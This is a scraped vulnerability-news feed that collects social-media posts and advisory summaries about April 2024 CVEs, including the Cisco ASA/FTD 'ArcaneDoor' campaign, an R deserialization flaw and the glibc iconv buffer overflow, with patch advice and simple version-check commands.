The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.

Technical Key Findings

CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.

Vulnerable Products

  • Cisco Adaptive Security Appliance (ASA) Software
  • Cisco Firepower Threat Defense (FTD) Software

Impact Assessment

Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.

Patches or Workaround

Cisco has released free software updates that address the vulnerability described in this advisory.

Tags

#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity

##

h4sh at 2024-04-26T02:00:08.232Z ##

Multiple government agencies has published an advisory on an ongoing APT campaign targeting Cisco ASA / FTD devices using post-auth RCE bug CVE-2024-20359 and CVE-2024-20358.

They don't know how the attackers initially got in.

Important note from the research published by Cisco Talos calling the APT operation* "ArcaneDoor":

> We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date. Our investigation is ongoing, and we will provide updates, if necessary, in the security advisories or on this blog.

cyber.gc.ca/en/news-events/cyb

blog.talosintelligence.com/arc

##

screaminggoat at 2024-04-24T20:18:30.442Z ##

While Cisco's Event Response lists CVE-2024-20358 as "leveraged in these attacks," its own security advisory states:

The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

🔗 CVE-2024-20358 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Command Injection Vulnerability

CISA's RSS feed showed that the security alert for the KEV additions created at 0800 ET, meaning it was coordinated and prepared in advance of Cisco's announcements. Because CISA only added the other two Cisco vulnerabilities, CVE-2024-20358 does not appear to be a known exploited vulnerability.

##

h4sh@infosec.exchange at 2024-04-26T02:00:08.000Z ##

Multiple government agencies has published an advisory on an ongoing APT campaign targeting Cisco ASA / FTD devices using post-auth RCE bug CVE-2024-20359 and CVE-2024-20358.

They don't know how the attackers initially got in.

Important note from the research published by Cisco Talos calling the APT operation* "ArcaneDoor":

> We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date. Our investigation is ongoing, and we will provide updates, if necessary, in the security advisories or on this blog.

cyber.gc.ca/en/news-events/cyb

blog.talosintelligence.com/arc

##

screaminggoat@infosec.exchange at 2024-04-24T20:18:30.000Z ##

While Cisco's Event Response lists CVE-2024-20358 as "leveraged in these attacks," its own security advisory states:

The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

🔗 CVE-2024-20358 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Command Injection Vulnerability

CISA's RSS feed showed that the security alert for the KEV additions created at 0800 ET, meaning it was coordinated and prepared in advance of Cisco's announcements. Because CISA only added the other two Cisco vulnerabilities, CVE-2024-20358 does not appear to be a known exploited vulnerability.

#Cisco #vulnerability #CVE_2024_202358 #ASA

##

CVE-2024-27322
(8.8 HIGH)

EPSS: 0.04%

updated 2024-04-29T21:30:34

8 posts

Deserialization of untrusted data can occur in the R statistical programming language, on any version starting at 1.4.0 up to and not including 4.4.0, enabling a maliciously crafted RDS (R Data Serialization) formatted file or R package to run arbitrary code on an end user’s system when interacted with.

jos1264@social.skynetcloud.site at 2024-04-30T14:30:04.000Z ##

Vulnerability in R Programming Language Could Fuel Supply Chain Attacks securityweek.com/vulnerability #Vulnerabilities #vulnerability #CVE202427322 #Featured

##

jos1264@social.skynetcloud.site at 2024-04-30T14:30:03.000Z ##

Vulnerability in R Programming Language Could Fuel Supply Chain Attacks securityweek.com/vulnerability #Vulnerabilities #vulnerability #CVE202427322 #Featured

##

AAKL at 2024-04-30T13:38:49.983Z ##

CVE-2024-27322, if you missed this:.

Vulnerability in R Programming Language Enables Supply Chain Attacks securityweek.com/vulnerability @SecurityWeek

##

jbhall56 at 2024-04-30T11:38:38.725Z ##

The CVE-2024-27322 security vulnerability in R's deserialization process gives attackers a way to execute arbitrary code in target environments via specially crafted files. darkreading.com/application-se

##

hrbrmstr@mastodon.social at 2024-04-29T14:13:24.000Z ##

🚨Looks like #RStats was not immune to deserialization bugs after all hiddenlayer.com/research/r-bit

Watch those R Data files (and, we now shld come up with better ways to ensure local R library integrity)!!

CVE-2024-27322

##

AAKL@infosec.exchange at 2024-04-30T13:38:49.000Z ##

CVE-2024-27322, if you missed this:. #cybersecurity #infosec

Vulnerability in R Programming Language Enables Supply Chain Attacks securityweek.com/vulnerability @SecurityWeek

##

jbhall56@infosec.exchange at 2024-04-30T11:38:38.000Z ##

The CVE-2024-27322 security vulnerability in R's deserialization process gives attackers a way to execute arbitrary code in target environments via specially crafted files. darkreading.com/application-se

##

hrbrmstr@mastodon.social at 2024-04-29T14:13:24.000Z ##

🚨Looks like #RStats was not immune to deserialization bugs after all hiddenlayer.com/research/r-bit

Watch those R Data files (and, we now shld come up with better ways to ensure local R library integrity)!!

CVE-2024-27322

##

CVE-2024-27956
(9.9 CRITICAL)

EPSS: 0.05%

updated 2024-04-29T09:31:52

1 posts

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ValvePress Automatic allows SQL Injection.This issue affects Automatic: from n/a through 3.92.0.

Nuclei template

1 repos

https://github.com/truonghuuphuc/CVE-2024-27956

CVE-2024-28076
(7.0 None)

EPSS: 0.07%

updated 2024-04-29T05:02:34

2 posts

The SolarWinds Platform was susceptible to a Arbitrary Open Redirection Vulnerability. A potential attacker can redirect to different domain when using URL parameter with relative entry in the correct format

screaminggoat at 2024-04-30T11:26:43.761Z ##

SolarWinds security advisory: SolarWinds Platform Arbitrary Open Redirection Vulnerability (CVE-2024-28076)
CVE-2024-28076 (7.0 high, disclosed 18 April 2024) arbitrary open redirection vulnerability. If exploited, a potential attacker can redirect to a different domain when using URL parameter with relative entry in the correct format.

Interestingly, SolarWinds wrote the vector as CVSS:7.0/AV:A/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:L
I didn't know we were up to CVSSv7!!

##

screaminggoat@infosec.exchange at 2024-04-30T11:26:43.000Z ##

SolarWinds security advisory: SolarWinds Platform Arbitrary Open Redirection Vulnerability (CVE-2024-28076)
CVE-2024-28076 (7.0 high, disclosed 18 April 2024) arbitrary open redirection vulnerability. If exploited, a potential attacker can redirect to a different domain when using URL parameter with relative entry in the correct format.

Interestingly, SolarWinds wrote the vector as CVSS:7.0/AV:A/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:L
I didn't know we were up to CVSSv7!!

#CVE_2024_28076 #SolarWinds #PatchTuesday #vulnerability

##

CVE-2024-2961(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-04-29T05:02:33

28 posts

The iconv() function in the GNU C Library versions 2.39 and older may overflow the output buffer passed to it by up to 4 bytes when converting strings to the ISO-2022-CN-EXT character set, which may be used to crash an application or overwrite a neighbouring variable.

1 repos

https://github.com/mattaperkins/FIX-CVE-2024-2961

H3liumb0y at 2024-04-24T08:26:00.201Z ##

Buffer Overflow in GNU C Library Affects Older Versions

Date: April 17, 2024

CVE: CVE-2024-2961

Vulnerability Type: Out-of-bounds Write

CWE: [[CWE-787]]

Sources: SecurityVulnerability.io, NVD Mitigation blog

Issue Summary

A critical buffer overflow vulnerability has been identified in the GNU C Library's iconv function when converting charsets to certain Chinese Extended encodings. This flaw occurs when converting strings to the ISO-2022-CN-EXT character set in versions prior to 2.40, potentially leading to application crashes or memory corruption.

Technical Key Findings

The vulnerability stems from improper boundary checks during character set conversion, allowing up to 4 bytes of overflow. This could enable attackers to execute arbitrary code or disrupt program operation by manipulating memory locations adjacent to the buffer.

Vulnerable Products

All versions of GNU C Library older than 2.40 are susceptible. (That's potentially 24 years of a buffer overflow presence in the glibc!)

Impact Assessment

The vulnerability poses a high risk, potentially affecting the confidentiality, integrity, and availability of systems utilizing the affected library versions. There is no evidence of active exploitation yet, but the severity of potential impacts warrants prompt attention.

Patches or Workaround

The GNU C Library has released patches for this vulnerability. Users are advised to update to version 2.40 or later. If you are unable to (or it's not available on your OS yet), you can mitigate this issue by disabling the affected charsets in gconv.

Check if you are vulnerable

// The first line of the linker version info should include the version of glibc (either as GLIBC or GNU libc).

ldd --version

// Check if the vulnerable encodings are enabled in iconv:

iconv -l | grep -E 'CN-?EXT'

If they are, you will see an output like:

ISO-2022-CN-EXT//
ISO2022CNEXT//

Tags

-2024-2961

##

harrysintonen at 2024-04-17T19:37:41.490Z ##

I wonder if GLIBC-SA-2024-0004 / CVE-2024-2961 "iconv() out-of-bound writes when writing escape sequence" might allow exploitation in some setuid binaries. Being limited to fixed values '$+I', '$+J', '$+K', '$+L', '$+M', or '$*H' for the overwrite does place fairly significant limitations, however. I believe it would have to be very specific scenario to be exploitable (maybe affecting code flow by setting some variable to nonzero)
sourceware.org/git/?p=glibc.gi

##

H3liumb0y@infosec.exchange at 2024-04-24T08:26:00.000Z ##

Buffer Overflow in GNU C Library Affects Older Versions

Date: April 17, 2024

CVE: CVE-2024-2961

Vulnerability Type: Out-of-bounds Write

CWE: [[CWE-787]]

Sources: SecurityVulnerability.io, NVD Mitigation blog

Issue Summary

A critical buffer overflow vulnerability has been identified in the GNU C Library's iconv function when converting charsets to certain Chinese Extended encodings. This flaw occurs when converting strings to the ISO-2022-CN-EXT character set in versions prior to 2.40, potentially leading to application crashes or memory corruption.

Technical Key Findings

The vulnerability stems from improper boundary checks during character set conversion, allowing up to 4 bytes of overflow. This could enable attackers to execute arbitrary code or disrupt program operation by manipulating memory locations adjacent to the buffer.

Vulnerable Products

All versions of GNU C Library older than 2.40 are susceptible. (That's potentially 24 years of a buffer overflow presence in the glibc!)

Impact Assessment

The vulnerability poses a high risk, potentially affecting the confidentiality, integrity, and availability of systems utilizing the affected library versions. There is no evidence of active exploitation yet, but the severity of potential impacts warrants prompt attention.

Patches or Workaround

The GNU C Library has released patches for this vulnerability. Users are advised to update to version 2.40 or later. If you are unable to (or it's not available on your OS yet), you can mitigate this issue by disabling the affected charsets in gconv.

Check if you are vulnerable

// The first line of the linker version info should include the version of glibc (either as GLIBC or GNU libc).

ldd --version

// Check if the vulnerable encodings are enabled in iconv:

iconv -l | grep -E 'CN-?EXT'

If they are, you will see an output like:

ISO-2022-CN-EXT//
ISO2022CNEXT//

Tags

#GNUCLibrary #CVE-2024-2961 #BufferOverflow #SecurityPatch #ISO2022CNEXT #CVE20242961 #iconv #iconvglibc

##

harrysintonen@infosec.exchange at 2024-04-17T19:37:41.000Z ##

I wonder if GLIBC-SA-2024-0004 / CVE-2024-2961 "iconv() out-of-bound writes when writing escape sequence" might allow exploitation in some setuid binaries. Being limited to fixed values '$+I', '$+J', '$+K', '$+L', '$+M', or '$*H' for the overwrite does place fairly significant limitations, however. I believe it would have to be very specific scenario to be exploitable (maybe affecting code flow by setting some variable to nonzero)
sourceware.org/git/?p=glibc.gi #GLIBCSA20240004 #CVE20242961 #vulnerability #infosec #cybersecurity

##

mttaggart@infosec.town at 2024-04-22T22:26:15.189Z ##

Oh just PHP apps? NBD #CVE_2024_2961 #ThreatIntel

securityonline.info/cve-2024-2961-glibc-vulnerability-opens-door-to-php-attacks-patch-immediately/

The vulnerability, cataloged under CVE-2024-2961 and rated 8.8 on the CVSS scale, resides in the ISO-2022-CN-EXT plugin of the glibc’s iconv library. This critical flaw occurs during the charset conversion process from UCS4, where specific escape characters are required to signify changes in the charset to the library. However, due to insufficient boundary checks on internal buffers, an out-of-bounds write can occur, allowing up to three bytes to be written outside the intended memory area.

This vulnerability poses a significant risk as it compromises the Integrity, Confidentiality, and Availability (ICA) triad by potentially allowing attackers to craft malicious character sequences that trigger the out-of-bounds write, leading to remote code execution. The exploitation of this flaw could result in application crashes, arbitrary memory corruption, data overwrites, and even system takeovers.

##

mttaggart@infosec.town at 2024-04-22T22:26:15.189Z ##

Oh just PHP apps? NBD #CVE_2024_2961 #ThreatIntel

securityonline.info/cve-2024-2961-glibc-vulnerability-opens-door-to-php-attacks-patch-immediately/

The vulnerability, cataloged under CVE-2024-2961 and rated 8.8 on the CVSS scale, resides in the ISO-2022-CN-EXT plugin of the glibc’s iconv library. This critical flaw occurs during the charset conversion process from UCS4, where specific escape characters are required to signify changes in the charset to the library. However, due to insufficient boundary checks on internal buffers, an out-of-bounds write can occur, allowing up to three bytes to be written outside the intended memory area.

This vulnerability poses a significant risk as it compromises the Integrity, Confidentiality, and Availability (ICA) triad by potentially allowing attackers to craft malicious character sequences that trigger the out-of-bounds write, leading to remote code execution. The exploitation of this flaw could result in application crashes, arbitrary memory corruption, data overwrites, and even system takeovers.

##

H3liumb0y at 2024-04-24T08:26:00.201Z ##

Buffer Overflow in GNU C Library Affects Older Versions

Date: April 17, 2024

CVE: CVE-2024-2961

Vulnerability Type: Out-of-bounds Write

CWE: [[CWE-787]]

Sources: SecurityVulnerability.io, NVD Mitigation blog

Issue Summary

A critical buffer overflow vulnerability has been identified in the GNU C Library's iconv function when converting charsets to certain Chinese Extended encodings. This flaw occurs when converting strings to the ISO-2022-CN-EXT character set in versions prior to 2.40, potentially leading to application crashes or memory corruption.

Technical Key Findings

The vulnerability stems from improper boundary checks during character set conversion, allowing up to 4 bytes of overflow. This could enable attackers to execute arbitrary code or disrupt program operation by manipulating memory locations adjacent to the buffer.

Vulnerable Products

All versions of GNU C Library older than 2.40 are susceptible. (That's potentially 24 years of a buffer overflow presence in the glibc!)

Impact Assessment

The vulnerability poses a high risk, potentially affecting the confidentiality, integrity, and availability of systems utilizing the affected library versions. There is no evidence of active exploitation yet, but the severity of potential impacts warrants prompt attention.

Patches or Workaround

The GNU C Library has released patches for this vulnerability. Users are advised to update to version 2.40 or later. If you are unable to (or it's not available on your OS yet), you can mitigate this issue by disabling the affected charsets in gconv.

Check if you are vulnerable

// The first line of the linker version info should include the version of glibc (either as GLIBC or GNU libc).

ldd --version

// Check if the vulnerable encodings are enabled in iconv:

iconv -l | grep -E 'CN-?EXT'

If they are, you will see an output like:

ISO-2022-CN-EXT//
ISO2022CNEXT//

Tags

-2024-2961

##

harrysintonen at 2024-04-17T19:37:41.490Z ##

I wonder if GLIBC-SA-2024-0004 / CVE-2024-2961 "iconv() out-of-bound writes when writing escape sequence" might allow exploitation in some setuid binaries. Being limited to fixed values '$+I', '$+J', '$+K', '$+L', '$+M', or '$*H' for the overwrite does place fairly significant limitations, however. I believe it would have to be very specific scenario to be exploitable (maybe affecting code flow by setting some variable to nonzero)
sourceware.org/git/?p=glibc.gi

##

H3liumb0y@infosec.exchange at 2024-04-24T08:26:00.000Z ##

Buffer Overflow in GNU C Library Affects Older Versions

Date: April 17, 2024

CVE: CVE-2024-2961

Vulnerability Type: Out-of-bounds Write

CWE: [[CWE-787]]

Sources: SecurityVulnerability.io, NVD Mitigation blog

Issue Summary

A critical buffer overflow vulnerability has been identified in the GNU C Library's iconv function when converting charsets to certain Chinese Extended encodings. This flaw occurs when converting strings to the ISO-2022-CN-EXT character set in versions prior to 2.40, potentially leading to application crashes or memory corruption.

Technical Key Findings

The vulnerability stems from improper boundary checks during character set conversion, allowing up to 4 bytes of overflow. This could enable attackers to execute arbitrary code or disrupt program operation by manipulating memory locations adjacent to the buffer.

Vulnerable Products

All versions of GNU C Library older than 2.40 are susceptible. (That's potentially 24 years of a buffer overflow presence in the glibc!)

Impact Assessment

The vulnerability poses a high risk, potentially affecting the confidentiality, integrity, and availability of systems utilizing the affected library versions. There is no evidence of active exploitation yet, but the severity of potential impacts warrants prompt attention.

Patches or Workaround

The GNU C Library has released patches for this vulnerability. Users are advised to update to version 2.40 or later. If you are unable to (or it's not available on your OS yet), you can mitigate this issue by disabling the affected charsets in gconv.

Check if you are vulnerable

// The first line of the linker version info should include the version of glibc (either as GLIBC or GNU libc).

ldd --version

// Check if the vulnerable encodings are enabled in iconv:

iconv -l | grep -E 'CN-?EXT'

If they are, you will see an output like:

ISO-2022-CN-EXT//
ISO2022CNEXT//

Tags

#GNUCLibrary #CVE-2024-2961 #BufferOverflow #SecurityPatch #ISO2022CNEXT #CVE20242961 #iconv #iconvglibc

##

harrysintonen@infosec.exchange at 2024-04-17T19:37:41.000Z ##

I wonder if GLIBC-SA-2024-0004 / CVE-2024-2961 "iconv() out-of-bound writes when writing escape sequence" might allow exploitation in some setuid binaries. Being limited to fixed values '$+I', '$+J', '$+K', '$+L', '$+M', or '$*H' for the overwrite does place fairly significant limitations, however. I believe it would have to be very specific scenario to be exploitable (maybe affecting code flow by setting some variable to nonzero)
sourceware.org/git/?p=glibc.gi #GLIBCSA20240004 #CVE20242961 #vulnerability #infosec #cybersecurity

##

mttaggart@infosec.town at 2024-04-22T22:26:15.189Z ##

Oh just PHP apps? NBD #CVE_2024_2961 #ThreatIntel

securityonline.info/cve-2024-2961-glibc-vulnerability-opens-door-to-php-attacks-patch-immediately/

The vulnerability, cataloged under CVE-2024-2961 and rated 8.8 on the CVSS scale, resides in the ISO-2022-CN-EXT plugin of the glibc’s iconv library. This critical flaw occurs during the charset conversion process from UCS4, where specific escape characters are required to signify changes in the charset to the library. However, due to insufficient boundary checks on internal buffers, an out-of-bounds write can occur, allowing up to three bytes to be written outside the intended memory area.

This vulnerability poses a significant risk as it compromises the Integrity, Confidentiality, and Availability (ICA) triad by potentially allowing attackers to craft malicious character sequences that trigger the out-of-bounds write, leading to remote code execution. The exploitation of this flaw could result in application crashes, arbitrary memory corruption, data overwrites, and even system takeovers.

##

mttaggart@infosec.town at 2024-04-22T22:26:15.189Z ##

Oh just PHP apps? NBD #CVE_2024_2961 #ThreatIntel

securityonline.info/cve-2024-2961-glibc-vulnerability-opens-door-to-php-attacks-patch-immediately/

The vulnerability, cataloged under CVE-2024-2961 and rated 8.8 on the CVSS scale, resides in the ISO-2022-CN-EXT plugin of the glibc’s iconv library. This critical flaw occurs during the charset conversion process from UCS4, where specific escape characters are required to signify changes in the charset to the library. However, due to insufficient boundary checks on internal buffers, an out-of-bounds write can occur, allowing up to three bytes to be written outside the intended memory area.

This vulnerability poses a significant risk as it compromises the Integrity, Confidentiality, and Availability (ICA) triad by potentially allowing attackers to craft malicious character sequences that trigger the out-of-bounds write, leading to remote code execution. The exploitation of this flaw could result in application crashes, arbitrary memory corruption, data overwrites, and even system takeovers.

##

sambowne at 2024-04-24T22:59:34.686Z ##

CVE-2024-2961 - glibc Vulnerability Opens Door to PHP Attacks: Patch Immediately securityonline.info/cve-2024-2

##

thenewoil@mastodon.thenewoil.org at 2024-04-24T20:30:33.000Z ##

#glibc Vulnerability Opens Door to #PHP Attacks

securityonline.info/cve-2024-2

#cybersecurity #FOSS #CVE

##

soller@fosstodon.org at 2024-04-23T13:06:53.000Z ##

glibc iconv buffer overflow vulnerability that can be used for remote code execution on servers running PHP. Present for 24 years. This is the kind of stuff Rust was made for.

- openwall.com/lists/oss-securit
- nvd.nist.gov/vuln/detail/CVE-2
- rockylinux.org/news/glibc-vuln

##

bookstack@fosstodon.org at 2024-04-23T09:27:14.000Z ##

A vulnerability (CVE-2024-2961) that may affect PHP applications is receiving patches on many operating systems. It's advised to update & restart your systems where patches are available.

Ubuntu/Debian/Fedora appear to have patches available for supported systems. Rocky has some checking/workaround guidance here:

rockylinux.org/news/glibc-vuln

##

bobby@mastodon.sexypokemon.xyz at 2024-04-23T06:06:37.000Z ##

There is a new PHP vulnerability out. It is being tracked as CVE-2024-2961. Here’s a video explaining the vulnerability youtu.be/u8jLUjpCWrs?si=Fm1JSB #cve #vulnerability #hacking #php #linux #news #Security

##

j3j5@hachyderm.io at 2024-04-21T21:42:42.000Z ##

tl;dr: upgrade glibc on your servers!

Summing it up, there's a vulnerability (CVE-2024-2961) on glibc that, apparently, can be used to get RCE on servers running PHP.
It's recommended that you update glibc to a patched version.

security-tracker.debian.org/tr
bugzilla.redhat.com/show_bug.c

There's an upcoming talk on May 10 where the researcher will explain how it was used to hack PHP servers.

offensivecon.org/speakers/2024

#PHP #glibc #iconv

##

j3j5@hachyderm.io at 2024-04-21T20:24:11.000Z ##

@ramsey it's this one CVE-2024-2961 security-tracker.debian.org/tr

##

cadey@pony.social at 2024-04-21T18:57:27.000Z ##

"No way to prevent this" say users of only language where this regularly happens

xeiaso.net/shitposts/no-way-to

##

sambowne@infosec.exchange at 2024-04-24T22:59:34.000Z ##

CVE-2024-2961 - glibc Vulnerability Opens Door to PHP Attacks: Patch Immediately securityonline.info/cve-2024-2

##

thenewoil@mastodon.thenewoil.org at 2024-04-24T20:30:33.000Z ##

#glibc Vulnerability Opens Door to #PHP Attacks

securityonline.info/cve-2024-2

#cybersecurity #FOSS #CVE

##

soller@fosstodon.org at 2024-04-23T13:06:53.000Z ##

glibc iconv buffer overflow vulnerability that can be used for remote code execution on servers running PHP. Present for 24 years. This is the kind of stuff Rust was made for.

- openwall.com/lists/oss-securit
- nvd.nist.gov/vuln/detail/CVE-2
- rockylinux.org/news/glibc-vuln

##

bookstack@fosstodon.org at 2024-04-23T09:27:14.000Z ##

A vulnerability (CVE-2024-2961) that may affect PHP applications is receiving patches on many operating systems. It's advised to update & restart your systems where patches are available.

Ubuntu/Debian/Fedora appear to have patches available for supported systems. Rocky has some checking/workaround guidance here:

rockylinux.org/news/glibc-vuln

##

bobby@mastodon.sexypokemon.xyz at 2024-04-23T06:06:37.000Z ##

There is a new PHP vulnerability out. It is being tracked as CVE-2024-2961. Here’s a video explaining the vulnerability youtu.be/u8jLUjpCWrs?si=Fm1JSB #cve #vulnerability #hacking #php #linux #news #Security

##

j3j5@hachyderm.io at 2024-04-21T21:42:42.000Z ##

tl;dr: upgrade glibc on your servers!

Summing it up, there's a vulnerability (CVE-2024-2961) on glibc that, apparently, can be used to get RCE on servers running PHP.
It's recommended that you update glibc to a patched version.

security-tracker.debian.org/tr
bugzilla.redhat.com/show_bug.c

There's an upcoming talk on May 10 where the researcher will explain how it was used to hack PHP servers.

offensivecon.org/speakers/2024

#PHP #glibc #iconv

##

j3j5@hachyderm.io at 2024-04-21T20:24:11.000Z ##

@ramsey it's this one CVE-2024-2961 security-tracker.debian.org/tr

##

cadey@pony.social at 2024-04-21T18:57:27.000Z ##

"No way to prevent this" say users of only language where this regularly happens

xeiaso.net/shitposts/no-way-to

##

CVE-2024-3847(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-04-28T06:31:27

2 posts

Insufficient policy enforcement in WebUI in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to bypass content security policy via a crafted HTML page. (Chromium security severity: Low)

screaminggoat at 2024-04-18T19:26:07.484Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

##

simontsui@infosec.exchange at 2024-04-18T19:26:07.000Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

#Microsoft #Chromium #Chrome #vulnerability

##

CVE-2024-3846(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-04-28T06:31:27

2 posts

Inappropriate implementation in Prompts in Google Chrome prior to 124.0.6367.60 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low)

screaminggoat at 2024-04-18T19:26:07.484Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

##

simontsui@infosec.exchange at 2024-04-18T19:26:07.000Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

#Microsoft #Chromium #Chrome #vulnerability

##

CVE-2024-3914(CVSS UNKNOWN)

EPSS: 0.05%

updated 2024-04-28T06:31:27

2 posts

Use after free in V8 in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

